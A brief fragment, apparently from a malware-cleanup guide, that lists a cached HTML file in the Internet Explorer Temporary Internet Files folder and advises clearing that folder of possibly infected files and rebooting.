C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.